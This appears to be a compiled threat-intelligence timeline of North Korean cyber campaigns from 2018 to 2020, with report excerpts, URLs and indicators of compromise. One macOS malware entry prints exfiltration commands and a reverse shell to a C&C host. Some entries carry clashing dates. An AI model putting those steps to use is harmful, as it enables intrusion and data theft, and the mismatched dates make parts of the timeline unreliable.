Date:: 2018-04-03 URL:: https://welivesecurity.com/2018/04/03/lazarus-killdisk-central-american-casino/ https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/ Tags:: Details::

Our analysis shows that the cybercriminals behind the attack against an online casino in Central America, and several other targets in late-2017, were most likely the infamous Lazarus hacking group. In all of these incidents the attackers utilized similar toolsets, including KillDisk; the disk-wiping tool that was executed on compromised machines.
Some of the past attacks attributed to the Lazarus Group attracted the interest of security researchers who relied on Novetta et al’s white papers with hundreds of pages describing the tools used in the attacks – the Polish and Mexican banks; the WannaCryptor outbreak; [phishing campaigns against US defense contractors, etc – and provides grounds for the attribution of these attacks to the Lazarus Group.
Our analysis of these two Win32/KillDisk.NBO variants revealed that they share many code similarities. Further, they are almost identical to the KillDisk variant used against financial organizations in Latin America, as described by Trend Micro.
One of the variants was protected using the commercial PE protector VMProtect in its 3rd generation, which made unpacking it trickier. The attackers most likely did not buy a VMProtect license but have rather used leaked or pirated copies available on the Internet. Using protectors is common for the Lazarus group: during the Polish and Mexican attacks in February 2017, they made use of Enigma Protector and some of the Operation Blockbuster samples, reported by Palo Alto Networks, used an older version of VMProtect.
This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack (we didn’t see these exact samples anywhere else). The attack itself was very complex, consisted of several steps, and involved tens of protected tools that, being stand-alone, would reveal little from their dynamics.
Utilizing KillDisk in the attack scenario most likely served one of two purposes: the attackers covering their tracks after an espionage operation, or it was used directly for extortion or cyber-sabotage. In any case, the fact that ESET products detected the malware on over 100 endpoints and servers in the organization signifies a large-scale effort of the attackers. Indicators::

Analyzing Operation GhostSecret: Attack Seeks to Steal Data Worldwide

Date:: 2018-04-24 URL:: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/ Tags:: Details::

McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure, entertainment, finance, health care, and telecommunications. This campaign, dubbed Operation GhostSecret, leverages multiple implants, tools, and malware variants associated with the state-sponsored cyber group Hidden Cobra. The infrastructure currently remains active. In this post, we dive deeply into this campaign.
Our investigation into this campaign reveals that the actor used multiple malware implants, including an unknown implant with capabilities similar to Bankshot. From March 18 to 26 we observed the malware operating in multiple areas of the world. This new variant resembles parts of the Destover malware, which was used in the 2014 Sony Pictures attack.
Furthermore, the Advanced Threat Research team has discovered Proxysvc, which appears to be an undocumented implant. We have also uncovered additional control servers that are still active and associated with these new implants. Based on our analysis of public and private information from submissions, along with product telemetry, it appears Proxysvc was used alongside the 2017 Destover variant and has operated undetected since mid-2017.
The attackers behind Operation GhostSecret used a similar infrastructure to earlier threats, including SSL certificates used by FakeTLS in implants found in the Destover backdoor variant known as Escad, which was used in the Sony Pictures attack. Based on our technical analysis, telemetry, and data from submissions, we can assert with high confidence that this is the work of the Hidden Cobra group. The Advanced Threat Research team uncovered activity related to this campaign in March 2018, when the actors targeted Turkish banks. These initial findings appear to be the first stage of Operation GhostSecret. For more on the global aspect of this threat, see “Global Malware Campaign Pilfers Data from Critical Infrastructure of Entertainment, Finance, Health Care, and Other Industries.” Indicators::

SWIFT: Comments on malware reports

Date:: 2018-04-25 URL:: https://swift.com/news-events/press-releases/swift-comments-malware-reports Tags:: Details::

Swift is aware of a malware that aims to reduce financial institutions’ abilities to evidence fraudulent transactions on their local systems. Contrary to reports that suggest otherwise, this malware has no impact on Swift’s network or core messaging services.
We understand that the malware is designed to hide the traces of fraudulent payments from customers’ local database applications and can only be installed on users’ local systems by attackers that have successfully identified and exploited weaknesses in their local security.
We have developed a facility to assist customers in enhancing their security and to spot inconsistencies in their local database records, however the key defence against such attack scenarios remains for users to implement appropriate security measures in their local environments to safeguard their systems - in particular those used to access Swift - against such potential security threats. Such protections should be implemented by users to prevent the injection of malware into, or any misappropriation of, their interfaces and other core systems.
Swift is making customers aware of the new facility through its ongoing Security Campaign. Indicators::

NavRAT: US-North Korea Summit As Decoy For Attacks In South Korea

Date:: 2018-05-31 URL:: https://blog.talosintelligence.com/2018/05/navrat.html Tags:: Details:: Indicators::

US v PARK JIN HYOK

Date:: 2018-06-08 URL:: https://justice.gov/opa/press-release/file/1092091/download Tags:: Details::

INFRASTRUCTURE: North Korean Computer Networks, The “Brambul” Worm, Use of a Proxy Service, Dynamic DNS (DDNS)
THE ATTACK ON SONY: Initiation of Overt Contact and Email Communications, Analysis of Malware and Infected Computers and Technical Details of the Intrusion, Theft of SPE’s Data and Distribution by Email and a Social Media Account Created by the Subjects, The SPE Movie “The Interview”, Social Media Accounts Were Used to Post Links to Malware on Other Social Media Accounts Related to “The Interview”, “Andoson David,” “Watson Henny” and Related Accounts, “Andoson David”, “Watson Henny” and “John Mogabe”, “Yardgen”, Intrusion at Mammoth Screen
INTRUSIONS AT FINANCIAL INSTITUTIONS: Bangladesh Bank Cyber-Heist, watsonhenny@gmail.com, yardgen@gmail.co, rsaflam8808@gmail.com, rasel.aflam@gmail.com, NESTEGG, FakeTLS Data Table, DNS Function, Intrusion at the African Bank: Connections to Bangladesh Bank, Watering Hole Campaign Targeting Financial Institutions
TARGETING OF OTHER VICTIMS: Defense Contractor Targeting, mrwangchung01@gmail.com , @erica_333u, jongdada02@gmail.com, Targeting of South Korean Entities
WANNACRY GLOBAL RANSOMWARE
THE “KIM HYON WOO” PERSONA: tty198410@gmail.co, hyon_u@hotmail.co, hyonwoo01@gmail.com, hyonwu@gmail.com, @hyon_u, Brambul Collector Accounts
PARK JIN HYOK: Chosun Expo, Dalian, China, ttykim1018@gmail.com, business2008it@gmail.com, surigaemind@hotmail.com, pkj0615710@hotmail.com, mrkimjin123@gmail.com, Access to Chosun Expo Accounts by North Korean IP Indicators::

Banco de Chile - Wiper Attack Just a Cover for $10M SWIFT Heist

Date:: 2018-06-13 URL:: https://threatpost.com/banco-de-chile-wiper-attack-just-a-cover-for-10m-swift-heist/132796/ Tags:: Details::

analysts discovered that the code is actually a modified version of the Buhtrap malware component known as kill_os. The module renders the local operating system and the Master Boot Record (MBR) unreadable by erasing them. Indicators::

New Andariel Reconnaissance Tactics Uncovered

Date:: 2018-07-16 URL:: https://trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html Tags:: Andariel Details::

Andariel has been quite active these past few months. According to South Korean security researchers IssueMakersLab, the group used an ActiveX zero-day exploit for watering hole attacks on South Korean websites last May—they called this Operation GoldenAxe. But more recently on June 21, we noticed that Andariel injected their script into four other compromised South Korean websites for reconnaissance purposes. Indicators::

Operation AppleJeus Research

Date:: 2018-08-23 URL:: https://securelist.com/operation-applejeus/87553/ Tags:: Applejeus Details::

Fallchill
New ability to target macOS.
Infected with malware after installing a legitimate-looking trading application called Celas Trade Pro from Celas Limited showed no signs of malicious behaviour and looked genuine. Malware delivered via update files in app. User installed this program via a download link delivered over email.
For macOS users, Celas LLC also provided a native version of its trading app. A hidden autoupdater module is installed in the background to start immediately after installation, and after each system reboot. Indicators::
196.38.48[.]121
185.142.236[.]226
80.82.64[.]91
185.142.239[.]173
www.celasllc[.]com/checkupdate.php

DOJ’s Criminal Complaint of a North Korean Regime-Backed Programmer Jin Hyok Park

Date:: 2018-09-06 URL:: https://justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and https://documentcloud.org/documents/4834226-2018-09-06-PARK-COMPLAINT-UNSEALED.html Tags:: Details::

Nathan P. Shields, FBI, Los Angeles Field Office
Park worked for front company Chosun Expo Joint Venture aka Korea Expo Joint Venture aka Chosun Expo Indicators::

NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT

Date:: 2018-10-01 URL:: https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/ Tags:: Details:: Indicators::

We believe APT38’s financial motivation, unique toolset, and tactics, techniques and procedures (TTPs) observed during their carefully executed operations are distinct enough to be tracked separately from other North Korean cyber activity. There are many overlapping characteristics with other operations, known as “Lazarus” and the actor we call TEMP.Hermit; however, we believe separating this group will provide defenders with a more focused understanding of the adversary and allow them to prioritize resources and enable defense. The following are some of the ways APT38 is different from other North Korean actors, and some of the ways they are similar Indicators::

Recorded Future: Lazarus Group Shifting Patterns in Internet Use Reveal Adaptable and Innovative North Korean Ruling Elite

Date:: 2018-10-25 URL:: https://recordedfuture.com/north-korea-internet-usage/ Tags:: Details:: Indicators::

Cryptocurrency businesses targeted by Lazarus via custom PowerShell Scripts

Date:: 2018-11-01 URL:: https://securelist.com/cryptocurrency-businesses-still-being-targeted-by-lazarus/90019/ Tags:: Details::

Developed custom PowerShell scripts that communicate with malicious C2 servers and execute commands from the operator.
The C2 server script names are disguised as WordPress (popular blog engine) files as well as those of other popular open source projects. Indicators::

Kimsuky: Stolen Pencil Campaign

Date:: 2018-12-05 URL:: https://netscout.com/blog/asert/stolen-pencil-campaign-targets-academia Tags:: Kimsuky Details:: Indicators::

Top secret report: North Korea keeps busting sanctions, evading U.S.-led sea patrols

Date:: 2018-12-14 URL:: https://nbcnews.com/news/north-korea/top-secret-report-north-korea-keeps-busting-sanctions-evading-u-n947926 Tags:: Details:: Indicators::

Group-IB: 2018 Crime Report

Date:: 2018-12-31 URL:: https://explore.group-ib.com/htct/hi-tech_crime_2018 Tags:: Details:: Indicators::

2019

Two Hundred North Korean hacker organizations dispatched overseas, each team sending up to $1 million to North Korea

Date:: 2019-01-30 URL:: https://chosun.com/site/data/html_dir/2019/01/30/2019013000267.html Tags:: Details:: Indicators::

Operation Kabar Cobra

Date:: 2019-02-08 URL:: https://global.ahnlab.com/global/upload/download/techreport/%5BAnalysis_Report%5DOperation%20Kabar%20Cobra.pdf Tags:: Kimsuky Details:: Indicators::

Operation Smoke Screen

Date:: 2019-04-17 URL:: https://blog.alyac.co.kr/2243 Tags:: Kimsuky Details:: Indicators::

North Korea's Next Weapon of Choice: Cyber

Date:: 2019-04-30 URL:: https://asiasociety.org/magazine/article/north-koreas-next-weapon-choice-cyber Tags:: Details:: Indicators::

ScarCruft: Continues to evolve, introduces Bluetooth harvester

Date:: 2019-05-13 URL:: https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/ Tags:: ScarCruft Details:: Indicators::

The All-Purpose Sword: North Korea’s Cyber Operations and Strategies

Date:: 2019-06-01 URL:: https://ccdcoe.org/uploads/2019/06/Art_08_The-All-Purpose-Sword.pdf Tags:: Details::

According to a 2013 briefing from the South Korean National Assembly by the South Korean National Intelligence Service, North Korean leader Kim Jongun stated, “Cyberwarfare is an all-purpose sword that guarantees the North Korean People’s Armed Forces ruthless striking capability, along with nuclear weapons and missiles.” Kim has secretly executed all-purpose cyberattacks to achieve his agenda, regardless of North Korea’s diplomatic and economic situation. The “all-purpose sword” has been adapted to the different purposes it has pursued against North in North Korea’s suspected cyber operations: specifically, Campaign Kimsuky, Operation KHNP, Operation DarkSeoul, Operation Blockbuster, the Bangladesh Central Bank Heist, and Wannacry. The operations will be categorized by operational goals, showing North Korea’s success at achieving its various purposes by these means. In the last section, we suggest a future cyber strategy direction for North Korea based on our analysis of its tactics, techniques and procedures; and how North Korea cooperates with other countries, including countermeasures for countries around the world. Korea’s adversaries, such as creating ransomware for financial gain, a cyberweapon to destroy computer systems, and an invisible espionage tool to accumulate sensitive information. This paper is divided into three parts. The first section discusses the will of North Korea to use cyber warfare for different purposes by explaining how its administrative agencies take charge of different fields but carry out cyber operations to achieve their goals. The second section describes and analyzes the interconnectivity Indicators::

JPCERT: Spear Phishing against Cryptocurrency Businesses

Date:: 2019-07-09 URL:: https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html Tags:: Details::

The zip file downloaded from the URL in the email contains a password-protected decoy document and a shortcut file Password.txt.lnk
This shortcut file contains some commands, and they run when the file is executed
The below image illustrates the flow of events from the shortcut file being executed until the VBScript-based downloader is launched.
CryptoCore Indicators::
service[.]amzonnews[.]club
75[.]133[.]9[.]84
update[.]gdrives[.]top
googledrive[.]network
drverify[.]dns-cloud[.]net
docs[.]googlefiledrive[.]com
europasec[.]dnsabr[.]com
eu[.]euprotect[.]net
092jb_378v3_1[.]googldocs[.]org
gbackup[.]gogleshare[.]xyz
drive[.]gogleshare[.]xyz
down[.]financialmarketing[.]live
drivegoogle[.]publicvm[.]com
googledrive[.]publicvm[.]com
mskpupdate[.]publicvm[.]com
googledrive[.]email
iellsfileshare[.]sharedrivegght[.]xyz
download[.]showprice[.]xyz
downs[.]showprice[.]xyz
mdown[.]showprice[.]xyz
start[.]showprice[.]xyz
u13580130[.]ct[.]sendgrid[.]net

Treasury Sanctions North Korean State-Sponsored Malicious Cyber Groups

Date:: 2019-09-13 URL:: https://home.treasury.gov/news/press-releases/sm774 Tags:: Details:: Indicators::

Mac Malware, Spoofs App, Steals User Information

Date:: 2019-09-20 URL:: https://trendmicro.com/en_us/research/19/i/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website.html Tags:: Applejeus Details:: We found two variants of the malware family. The first one contains a pair of shell scripts and connects to a remote site to decrypt its encrypted codes while the second sample, despite using a simpler routine involving a single shell script, actually incorporates a persistence mechanism. The first suspicious component we found was an app bundle under the Resources directory, which seems to be a copy of the legitimate Stockfolio version 1.4.13 but with the malware author’s digital certificate. It then encodes the collected information using base64 encoding and saves the collected information in a hidden file: /tmp/.info. It then uploads the file to hxxps://appstockfolio.com/panel/upload[.]php using the collected username and machine serial number as identifiers. The script run.sh collects usernames and ip addresses from the infected machine via the following command: username = ‘whoami’ ip address = 'curl -s ipecho.net/plain' It connects to the malware URL hxxp://owpqkszz[.]info to send the username and IP address information using the following format: owpqkszz[.]info/link.php?{username}&{ip address} It then creates a simple reverse shell to the C&C server 193[.]37[.]212[.]176. Once connected, the malware author can run shell commands. Indicators:: Stockfoli Trojan.MacOS.GMERA.A Trial_Stockfoli.zip Trojan.MacOS.GMERA.A com.apple.upd.plist Trojan.MacOS.GMERA.B run.sh Trojan.SH.GMERA.B Stockfoli (sample 2) Trojan.MacOS.GMERA.B Trial_Stockfoli.zip (sample 2) Trojan.MacOS.GMERA.B 193.37.212[.]176

Pass the AppleJeus: a mac backdoor written by the infamous lazarus apt group

Date:: 2019-10-12 URL:: https://objective-see.org/blog/blog_0x49.html Tags:: Applejeus Details:: Indicators::

Attackers Create Elaborate Crypto Trading Scheme to Install Malware

Date:: 2019-10-12 URL:: https://bleepingcomputer.com/news/security/attackers-create-elaborate-crypto-trading-scheme-to-install-malware/ Tags:: Applejeus Details::

Security researcher MalwareHunterTeam discovered a scheme where an attacker has created a fake company that is offering a free cryptocurrency trading platform called JMT Trader. When this program is installed, it will also infect a victim with a backdoor Trojan. Indicators::

Indian Nuclear Power Plant Attack

Date:: 2019-10-29 URL:: https://greatgameindia.com/kudankulam-nuclear-power-plant-hit-by-cyberattack/ https://x.com/issuemakerslab/status/1191519079514796032 https://x.com/issuemakerslab/status/1190846548415959040 Tags:: Details::

Previously unknown spy tool, which had been spotted in Indian financial institutions and research centers
Called Dtrack, this spyware reportedly was created by the Lazarus group and is being used to upload and download files to victims’ systems, record key strokes and conduct other actions typical of a malicious remote administration tool (RAT).
ATMDtrack – malware created to infiltrate Indian ATMs and steal customer card data. Following further investigation using the Kaspersky Attribution Engine and other tools, the researchers found more than 180 new malware samples that had code sequence similarities with the ATMDtrack, but at the same time were not aimed at ATMs. Instead, its list of functions defined it as spy tools, now known as Dtrack.
Moreover, not only did the two strains share similarities with each other, but also with the 2013 DarkSeoul campaign, which was attributed to Lazarus – an infamous advanced persistence threat actor responsible for multiple cyberespionage and cyber sabotage operations. Indicators::

Lazarus Group Goes 'Fileless' - macOS Threat Served from Cryptocurrency Trading Platform

Date:: 2019-12-04 URL:: https://objective-see.org/blog/blog_0x51.html https://bleepingcomputer.com/news/security/new-macos-threat-served-from-cryptocurrency-trading-platform/ https://x.com/dineshdina04/status/1201834142704394242 Tags:: Details::

UnionCryptoTrader
Lazarus group continues to target macOS users with ever evolving capabilities. Today, we analyzed a new sample with the ability to remotely download and execute payloads directly from memory! Indicators::

2020

Operation AppleJeus Sequel

Date:: 2020-01-08 URL:: https://securelist.com/operation-applejeus-sequel/95596/ Tags:: Applejeus Details::

macOS malware Indicators::
c2ffbf7f2f98c73b98198b4937119a18 MacInstaller.dmg
8b4c532f10603a8e199aa4281384764e BitcoinTrader.pkg
cb56955b70c87767dee81e23503086c3 WbBot.pkg
be37637d8f6c1fbe7f3ffc702afdfe1d MarkMakingBot.dmg
bb66ab2db0bad88ac6b829085164cbbb BitcoinTrader.pkg
6588d262529dc372c400bef8478c2eec UnionCryptoTrader.dmg
55ec67fa6572e65eae822c0b90dc8216 UnionCryptoTrader.pkg
39cdf04be2ed479e0b4489ff37f95bbe JMTTrader_Mac.dmg
e35b15b2c8bb9eda8bc4021accf7038d JMTTrader.pkg
a9e960948fdac81579d3b752e49aceda WFCUpdater.exe
24B3614D5C5E53E40B42B4E057001770 UnionCryptoTraderSetup.exe
629B9DE3E4B84B4A0AA605A3E9471B31 UnionCryptoUpdater.exe
E1953FA319CC11C2F003AD0542BCA822 AdobeUpdator.exe, AdobeARM.exe
f221349437f2f6707ecb2a75c3f39145 rasext.dll
055829E7600DBDAE9F381F83F8E4FF36 UnionCryptoTraderSetup.exe
F051A18F79736799AC66F4EF7B28594B Unistore.exe
wb-bot.org
jmttrading.org
cyptian.com
beastgoc.com
private-kurier.com
wb-invest.net
wfcwallet.com
chainfun365.com
buckfast-zucht.de
invesuccess.com
aeroplans.info
mydealoman.com
unioncrypto.vip
104.168.167.16
23.254.217.53
185.243.115.17
104.168.218.42
95.213.232.170
108.174.195.134
185.228.83.32
172.81.135.194
wb-bot[.]org/certpkg.php
95.213.232[.]170/ProbActive/index.do
beastgoc[.]com/grepmonux.php
unioncrypto[.]vip/update

Deep-Dive: The Lazarus Group

Date:: 2020-02-06 URL:: https://blog.bushidotoken.net/2020/02/deep-dive-lazarus-group.html Tags:: Details::

North Korea continues to utilise Lazarus (a/k/a Lab 110 or Unit 180 or Bureau 121) for devastating cyber attacks against any target deemed worthy. Lazarus is certainly a financially motivated APT which generates funds for the regime's developing WMD program - at the peril of global condemnation. North Korea is currently under some of the harshest international sanctions in the world, with China being its single trading partner. Therefore, the regime has created Lazarus as a tool to earn additional funds for financing expensive nuclear weapons development. Cyber attacks appear to be an ideal way for the regime to generate funds and can still sow doubt into the minds of many because some still believe North Korea is not capable of such attacks. It is more than likely Lazarus is plotting or in the midst of another attack campaign, as what North Korea does have is time. Indicators::

Treasury Sanctions Individuals Laundering Cryptocurrency for Lazarus Group

Date:: 2020-03-02 URL:: https://home.treasury.gov/news/press-releases/sm924 Tags:: Details:: Indicators::

How an elaborate North Korean crypto hacking heist fell apart

Date:: 2020-03-05 URL:: https://wired.co.uk/article/north-korea-cryptocurrency-hacking-china Tags:: Details::

Two of the usernames adopted were snowsjohn and khaleesi
Between July 2018 and April 2019, they handled $100,812,842.54 in cryptocurrency transactions which were linked back to the $250m heist on the crypto exchange. Indicators::

UNC2891: Have Your Cake and Eat it Too?

Date:: 2020-03-16 URL:: https://mandiant.com/resources/unc2891-overview Tags:: UNC2891 Details::

UNC2891 intrusions appear to be financially motivated and in some cases spanned several years through which the actor had remained largely undetected.
Mandiant discovered a previously unknown rootkit for Oracle Solaris systems that UNC2891 used to remain hidden in victim networks, we have named this CAKETAP.
Mandiant expects that UNC2891 will continue to capitalize on this and perform similar operations for financial gain that target mission critical systems running these operating systems. Indicators::

CISA: Guidance on the North Korean Cyber Threat

Date:: 2020-04-15 URL:: https://cisa.gov/uscert/ncas/alerts/aa20-106a Tags:: Details:: Indicators::

CISA: Alert on TraderTraitor

Date:: 2020-04-18 URL:: https://cisa.gov/uscert/ncas/alerts/aa22-108a Tags:: TraderTraitor Details:: Indicators::

OXT: The North Korean Connection

Date:: 2020-04-29 URL:: https://oxtresearch.com/the-north-korean-connection/ Tags:: Details:: Indicators::

Leery Turtle: Threat Report

Date:: 2020-05-06 URL:: https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf Tags:: Dangerous Password, Leery Turtle Details::

Image 1 - Example phishing e-mail imita2ng Google Drive
A password-protected PDF file is sent alongside an LNK shortcut that imitates a text file containing the pdf’s password.
1. When double-clicked the shortcut file sends an HTTP request to a remote server through Windows utility mshta.exe. This request is intended to download and execute the first stage payload.
1. The attacker’s web server responds with a VBS payload which will be executed. Additional controls on the server-side are present. For example, we have observed that the server is checking if the user agent string is matching with MSHTA.
1. We observed that the webserver is always running on TCP 8080.
1. The first stage payload gathers information about the infected system and sends them to the command and control server.
1. CNC server responds with a Second Stage VBS payload, which will be saved under the %TEMP% directory.
1. Malware creates a shortcut file named ‘xBoxOne.lnk’ under the Startup directory as a means of persistence.
LNK Shortcut File - Password.txt.lnk Indicators::
bit[.]ly/37W6fgx
092jb_378v3_1[.]googldocs[.]org
_jfieo2_se[.]drivegooglshare[.]xyz
att[.]gdrvupload[.]xyz
check[.]onedrvdn[.]co
client[.]googleapis[.]online
docs[.]gdriveshare[.]top
docs[.]googlefiledrive[.]com
down[.]financialmarketing[.]live
download[.]gdriveupload[.]site
drive[.]gogleshare[.]xyz
drive[.]googleupload[.]info
drivegoogle[.]publicvm[.]com
drivelnk[.]liveonedrvshare[.]xyz
drives[.]googlecloud[.]live
file[.]onedrivecloud[.]store
gbackup[.]gogleshare[.]xyz
gdocs[.]googleupload[.]info
iellsfileshare[.]sharedrivegght[.]xyz
mail[.]gdriveupload[.]info
mail[.]gmaildrive[.]site
mail[.]googleupload[.]info
microsoft-update10v[.]amazonaws1[.]info
scloud[.]wechart[.]org
service[.]amzonnews[.]club
start[.]showprice[.]xyz
support[.]gdrvcheck[.]co
update[.]gdrives[.]top
upload[.]gdrives[.]best
verify[.]googleauth[.]pro
www[.]msupdatepms[.]xyz

CISA's analysis of North Korean Trojans: COPPERHEDGE, TAINTEDSCRIBE, PEBBLEDASH

Date:: 2020-05-12 URL:: https://cisa.gov/news-events/alerts/2020/05/12/north-korean-malicious-cyber-activity Tags:: Details::

COPPERHEDGE: The Manuscrypt family of malware is used by advanced persistent threat (APT) cyber actors in the targeting of cryptocurrency exchanges and related entities. Manuscrypt is a full-featured Remote Access Tool (RAT) capable of running arbitrary commands, performing system reconnaissance, and exfiltrating data. Six distinct variants have been identified based on network and code features. The variants are categorized based on common code and a common class structure. A symbol remains in some of the implants identifying a class name of WinHTTP_Protocol and later WebPacket.
TAINTEDSCRIBE: This report looks at a full-featured beaconing implant and its command modules. These samples uses FakeTLS for session authentication and for network encryption utilizing a Linear Feedback Shift Register (LFSR) algorithm. The main executable disguises itself as Microsoft’s Narrator. It downloads its command execution module from a command and control (C2) server and then has the capability to download, upload, delete, and execute files; enable Windows CLI access; create and terminate processes; and perform target system enumeration.
PEBBLEDASH: This report looks at a full-featured beaconing implant. This sample uses FakeTLS for session authentication and for network encoding utilizing RC4. It has the capability to download, upload, delete, and execute files; enable Windows CLI access; create and terminate processes; and perform target system enumeration. Indicators::

USA Chargees 28 North Koreans and 5 Chinese citizens with laundering more than $2.5 billion in assets to help fund North Korea’s nuclear weapons

Date:: 2020-05-28 URL:: https://europeansanctions.com/2020/05/us-charges-33-with-violating-n-korea-wmd-sanctions/ https://nknews.org/2020/05/doj-accuses-north-koreans-of-multi-year-2-5-billion-money-laundering-scheme/ https://edition.cnn.com/2020/05/28/politics/north-korean-bankers-charges-money-laundering/index.html https://int.nyt.com/data/documenthelper/6971-north-korea-indictment/422a99ddac0c39459226/optimized/full.pdf#page=1 Tags:: Details::

Bringing criminal charges against 28 North Korean and 5 Chinese nationals for conspiring to violate DPRK and proliferation sanctions. Indicators::

ClearSky: CryptoCore A Threat Actor Targeting Cryptocurrency Exchanges

Date:: 2020-06-01 URL:: https://clearskysec.com/wp-content/uploads/2020/06/CryptoCore_Group.pdf Tags:: Dangerous Password, CryptoCore Details::

CryptoCore, Dangerous Password, Leery Turtle
The group often uses Google Drive as the storage for its files, specifically the bait
Relatively heavy use of VBS files both as downloaders and as backdoors. What appears to be the main backdoor of the group is also a VBS file (tracked by Proofpoint Emerging Threats as CageyChameleon), rather than an executable or an in-memory payload.
LNK shortcuts as downloaders – we have seen the attackers hide LNK shortcuts behind icons and titles of other file types, mostly text files. Sometimes it could be a password file needed to open the main document, sometimes it could be the main document that is actually a shortcut, but LNK files are a staple for this group. These files are used to connect to the command and control (C2) server and download next-stage files.
.xyz TLD via NameCheap
The VBS created in %TEMP% acts as a downloader for another VBS. That VBS collects: Username, Host name, OS version, install date and run time, Time zone, CPU name, Execution path of the VBS in %TEMP%, Network adapter information, List of running processes. The information is sent to the C2 server every minute, and it expects additional VBS as a response.
heavy use of bitly, google drive, onedrive Indicators::

U.S. Government Advisory: Guidance on the North Korean Cyber Threat

Date:: 2020-06-23 URL:: https://cisa.gov/news-events/cybersecurity-advisories/aa20-106a Tags:: Details::

Many DPRK cyber actors are subordinate to UN- and U.S.-designated entities, such as the Reconnaissance General Bureau. DPRK state-sponsored cyber actors primarily consist of hackers, cryptologists, and software developers who conduct espionage, cyber-enabled theft targeting financial institutions and digital currency exchanges, and politically-motivated operations against foreign media companies. They develop and deploy a wide range of malware tools around the world to enable these activities and have grown increasingly sophisticated. Common tactics to raise revenue illicitly by DPRK state-sponsored cyber actors include, but are not limited to: Cyber-Enabled Financial Theft and Money Laundering, Extortion Campaigns, Cryptojacking Indicators::

VHD ransomware, Hakuna MATA

Date:: 2020-07-01 URL:: https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/ Tags:: Details::

initial access was achieved through opportunistic exploitation of a vulnerable VPN gateway. After that, the attackers obtained administrative privileges, deployed a backdoor on the compromised system and were able to take over the Active Directory server. Indicators::

ATP 7-100.2. North Korean Tactics

Date:: 2020-07-01 URL:: https://irp.fas.org/doddir/army/atp7-100-2.pdf Tags:: Details::

Army Training Publication (ATP) 7-100.2 describes North Korean tactics for use in Army training, professional education, and leader development. This document is part of the ATP 7-100 series that addresses a nation-state’s military doctrine with a focus on army ground forces and tactical operations in offense, defense, and related mission sets. Other foundational topics include task organization, capabilities, and limitations related to military mission and support functions. ATP 7-100.2 serves as a foundation for understanding how North Korean ground forces think and act in tactical operations. This publication presents multiple examples of functional tactics in dynamic operational environment conditions. The tactics in this ATP are descriptive, and provide an orientation to tactics gathered from North Korean doctrine, translated literature, and observations from recent historical event. Indicators::

North Korea Military Power: A Growing Regional and Global Threat

Date:: 2020-07-01 URL:: https://www.dia.mil/Portals/110/Documents/News/North_Korea_Military_Power.pdf Tags:: Details::

From North Korean Leader Kim Jong Un's Remarks at the 8th Workers’ Party Congress, Released 9 January 2021 “Building the national nuclear force was a strategic and predominant goal. The status of our state as a nuclear weapons state…enabled it to bolster its powerful and reliable strategic deterrent for coping with any threat by providing a perfect nuclear shield. New, cutting edge weapons systems were [also] developed one after another … making our state’s superiority in military technology irreversible and putting its war deterrent and capability of fighting war on the highest level.”
North Korea is one of the most militarized countries in the world and remains a critical security challenge for the United States, our Northeast Asian allies, and the international community. The Kim regime has seen itself as free to take destabilizing actions to advance its political goals, including attacks on South Korea, development of nuclear weapons and ballistic missiles, proliferation of weapons, and cyberattacks against civilian infrastructure worldwide. Compounding this challenge, the closed nature of the regime makes gathering facts about North Korea's military extremely difficult. Just over twenty years ago, North Korea appeared to be on the brink of national collapse. Economic assistance from former patrons in the Soviet Union disappeared; society was confronted with the death in 1994 of regime founder Kim Il Sung—revered as a deity by his people—and a 3-year famine killed almost a million people. Many experts in academia and the Intelligence Community predicted that North Korea would never see the 21st century. Yet today, North Korea not only endures under a third-generation Kim family leader, it has become a growing menace to the United States and our allies in the region. Kim Jong Un has pressed his nation down the path to develop nuclear weapons and combine them with ballistic missiles that can reach South Korea, Japan, and the United States. He has implemented a rapid, ambitious missile development and flight-testing program to refine these capabilities and improve their reliability. His vision of a North Korea that can directly hold the United States at risk, and thereby deter Washington and compel it into policy decisions beneficial to Pyongyang, is clear and is plainly articulated as a goal in authoritative North Korean rhetoric. Equally dangerous, North Korea continues to maintain one of the world’s largest conventional militaries that directly threatens South Korea. The North can launch a high-intensity, short-duration attack on the South with thousands of artillery and rocket systems. This option could cause thousands of casualties and massive disruption to a regional economic hub. Kim Jong Un’s emphasis on improving military training and investment in new weapon systems highlights the overriding priority the regime puts on its military capabilities. In 2018, at the historic first summit between Kim Jong Un and the President of the United States, North Korea pledged to work with the United States to accomplish what it described as “the denuclearization of the Korean Peninsula”, and committed to other measures to reduce tensions and achieve “a lasting and stable peace regime.” In the following years, North Korea tested multiple new missiles that threaten South Korea and U.S. forces stationed there, displayed a new potentially more capable ICBM and new weapons for its conventional force. Additionally, there continues to be activity at North Korea’s nuclear sites. These actions indicate that North Korea will continue to be a challenge for the United States in the coming years. This report, is a baseline examination of North Korea and its core military capabilities, and is intended to help us better understand the current threat Pyongyang poses to the United States and its allies. Indicators::

North Korean hackers are skimming US and European shoppers

Date:: 2020-07-06 URL:: https://sansec.io/research/north-korea-magecart Tags:: Details:: Indicators::

U.S. seeks forfeiture of $2,372,793 for violations of sanctions against the DPRK

Date:: 2020-07-23 URL:: https://justice.gov/opa/pr/united-states-files-complaint-forfeit-more-237-million-companies-accused-laundering-funds Tags:: Details::

According to the complaint, the four companies laundered U.S. dollars on behalf of sanctioned North Korean banks and helped those banks to illegally access the U.S. financial market.
